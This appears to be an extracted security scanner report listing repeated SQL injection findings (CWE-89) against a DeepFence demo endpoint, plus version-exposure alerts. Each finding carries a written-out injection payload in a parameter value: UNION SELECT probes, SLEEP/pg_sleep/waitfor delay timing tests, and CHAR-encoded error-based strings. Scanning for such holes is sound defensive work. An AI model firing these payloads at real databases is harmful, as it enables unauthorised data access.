<!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #734\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \" or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #735\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #736\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #737\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #738\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #739\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #740\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #741\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #742\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io ' GROUP BY columnnames having 1=1 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #743\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #744\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #745\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #746\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #747\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = 